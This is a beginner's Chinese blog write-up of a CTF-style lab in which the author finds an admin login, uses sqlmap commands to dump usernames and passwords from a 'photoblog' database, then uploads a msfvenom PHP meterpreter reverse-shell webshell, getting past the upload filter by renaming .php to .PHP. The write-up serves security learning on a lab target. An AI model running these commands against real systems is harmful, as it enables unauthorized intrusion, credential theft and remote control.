小白学习CTF第六天-web安全sql注入

最新推荐文章于 2024-05-16 19:21:42 发布
最新推荐文章于 2024-05-16 19:21:42 发布
阅读量313 收藏 1
点赞数
文章标签: linux 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105557756
版权

web安全sql注入

sql注入介绍

在这里插入图片描述

信息探测

在这里插入图片描述
这里的基本操作与之前的没有什么出入,
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

深入挖掘

在这里插入图片描述
深入挖掘,之后我们发现了一个敏感的网址/admin/login.php
在这里插入图片描述
打开之后,我们发现了一个类似的登录界面,这个时候,我们尝试使用弱口令,发现无法登陆,那我们就要去找用户名和密码了:

漏洞扫描

使用owasp-zap这个非常好用的漏洞扫描器:
在这里插入图片描述
打开owasp-zap:
在这里插入图片描述
对靶场进行攻击:
在这里插入图片描述
进行自动扫描,之后我们分析扫描结果:
在这里插入图片描述
我们发现了一个高危漏洞:sql注入
在这里插入图片描述

漏洞利用

接下来我们就要利用这个sql注入漏洞进行攻击:
在这里插入图片描述

http://192.168.56.107/cat.php?id=3-2

sqlmap -u "http://192.168.56.107/cat.php?id=3"

sqlmap -u "http://192.168.56.107/cat.php?id=3" --dbs

sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" --tables

sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" --colunns

sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

我们把扫描结果的URL进行复制:
在这里插入图片描述
登陆之后我们发现了类似界面,这样我们可以以后利用这个页面
在这里插入图片描述
接下来我们开始准备获取用户名以及密码:
在这里插入图片描述
查看可能利用的错误输入造成sql注入:
在这里插入图片描述
查看所存在的数据库:
在这里插入图片描述
查看photoblog数据库中的表:
在这里插入图片描述
接下来准备进行密码破解:
在这里插入图片描述
在这里插入图片描述
我们得到了用户名以密码。
使用得到的用户名以及密码之后我们登陆成功了!!!
在这里插入图片描述

上传shell反弹权限

在这里插入图片描述
生成一个webshell:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.104 lport=4444 -f raw

在这里插入图片描述
保存webshell到桌面上:
在这里插入图片描述
设置对应的参数
在这里插入图片描述
之后我们上传对应webshell.php(注意这里可能对.php有过滤机制,这个时候我们可以使用.PHP来绕过过滤机制)
.php->.PHP
在这里插入图片描述
上传完对应的文件,之后记得点击对应的文件使其执行,我们才可以反弹回对应的权限。
这个时候就会反弹回对应的权限:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们拿下了靶场,这个靶场设置的没有flag,就是为了学会sql注入而设计的。
ok!!!

bbhh1139
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF Web学习(四)----SQL注入
网络猿的博客
01-11 1216
CTF Web学习(四) SQL注入 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改、隐藏 CTF Web学习(二):代码审计、burp suite应用 CTF Web学习(三):python脚本的编写及应用 文章目录CTF Web学习(四)前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。
CTFHub | web—SQL注入(整数型注入
2301_76435948的博客
09-23 189
拿到flag。
CTF-Web小白入门篇超详细——了解CTF-Web基本题型及其解题方法 总结——包含例题的详细题解
热门推荐
日熙的博客
09-29 14万+
上次经过一次比赛的打击,决定不能只是一直盲目的刷基础题,应该加快进度,从各种基本题型开始下手,每种题型都应该去找题目刷一刷,并做好总结,于是乎决定写下这篇文章。之后会边做题边更新,欢迎各位大佬指教。 本文目录基础知识类题目总结:具体题型包括:HTTP头相关的题目Git源码泄露Python爬虫信息处理PHP代码审计(重要!!!)XSS题目绕过wafSQL注入 基础知识类题目 总结: 1.是最基本...
小白网安自学路第一篇--SQL注入
wing_bsj的博客
01-14 295
小白网安自学路第一篇–SQL注入 sql注入概念 sql注入,web应用未对用户传入数据的合法性进行判断或者过滤不严,攻击者将传入参数拼接在数据库查询的sql语句中,从而达到对数据库进行非法操作的目的。 sql注入基本原理 先来一个sql语句: select * from article where id= ('1') 这个1,即为用户传入的参数,这个参数不止是在各种表单提交处,搜索框,还有一些动态跳转页面,就像是php?page=…,这个page后面的数据有时候也是有可能需要提交到数据库中的,所以请多多
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF web安全经典例题讲解
10-22
该内容为CTF赛题web安全经理例题讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种题型讲解,图文结合,适合新手学习
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
CTF-网络挑战使用PHP在Web中进行CTF挑战链接: :
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期 脚本及工具
Linux部署安装
凌北辰的博客
05-10 499
因为在RPM安装过程中经常需要解决依赖关系,而有些依赖关系并不会有准确的依赖安装包提示信息,YUM是RPM包管理工具,可以很好解决RPM包安装过程中会遇到的依赖关系问题。YUM安装软件时至少需要一个YUM源,YUM源就像一个存放了好多RPM包的仓库,用户可以使用ftp、http等方式访问YUM源。Linux上大部分软件都是开源软件(apache、tomcat、PHP、MySQL等)YUM可以从多个 源中搜索软件及软件安装所依赖的安装包,并自动安装相应的依赖软件。软件组安装-字符界面安装图形化。
Linux知识点笔记
最新发布
exercise_smile的博客
05-16 738
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
Linux FT260驱动内核学习笔记
pq的博客
05-12 783
系统采用Ubuntu 22,X86 64。
Linux -- gdb
yyl0327的博客
05-12 818
GDB(GNU Debugger)是一个功能强大的开源调试工具,主要用于调试C和C++编写的程序。它允许你查看程序执行时的内部情况,可以用来设置断点、单步执行代码、查看变量值等,以帮助开发者找出程序中的错误。GDB 是 GNU 项目的一部分,广泛应用于各种Unix-like系统中,包括Linux、BSD等操作系统。
【Linux】进程状态
2201_76024104的博客
05-11 862
我们之前说了进程,进程也是有状态的,这也是好理解的,因为进程不可能一直在CPU中跑着,当进程在CPU运行时或者在运行队列中我们都叫运行状态,有运行状态就有其他状态,比如后面要说的和。为什么要有状态呢?因为当前的状态决定了进程后续的动作进程需要排队一定是因为在,它可以在CPU运行队列中,它要等待CPU执行;它也可以等待比如键盘资源,比如scanf就要等待键盘写入东西。并且只要是排队,一定是。
linux SSH连接banner设置
小恒的博客
05-10 461
文件中找到Banner选项(如果存在),并取消注释。如果Banner选项不存在,请将其添加到文件中。本文会实现linux中设置ssh登录时显示的banner自定义 启用Banner功能,编辑。重新启动SSH服务以使更改生效。在SSH连接成功后了解服务器地址,期限,拥有者,服务器硬件配置,环境变量等重要信息。若出现以下输出,则系统中没有名为ssh.service的systemd单元。启用并启动SSH服务: 使用以下命令启用并启动SSH服务。增加banner后,尝试SSH连接。如果找不到ssh,则使用。
linux fdisk 银河麒麟操作系统 v10 磁盘分区和挂载 详细教程
tonyhi6的博客
05-11 327
linux fdisk 银河麒麟操作系统 v10 磁盘分区和挂载 详细教程
Linux mkdir命令参数和选项
2301_78660211的博客
05-16 473
mkdir命令是Linux操作系统中一个非常重要的命令,它可以帮助我们创建新的目录。在这篇博客中,我们介绍了mkdir命令的基本用法、参数、选项,以及mkdir命令的实际应用。希望这篇博客能帮助读者更好地理解和使用mkdir命令。
Kubernetes——命令指南
一坨小橙子的博客
05-13 765
Kubernetes命令指南
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值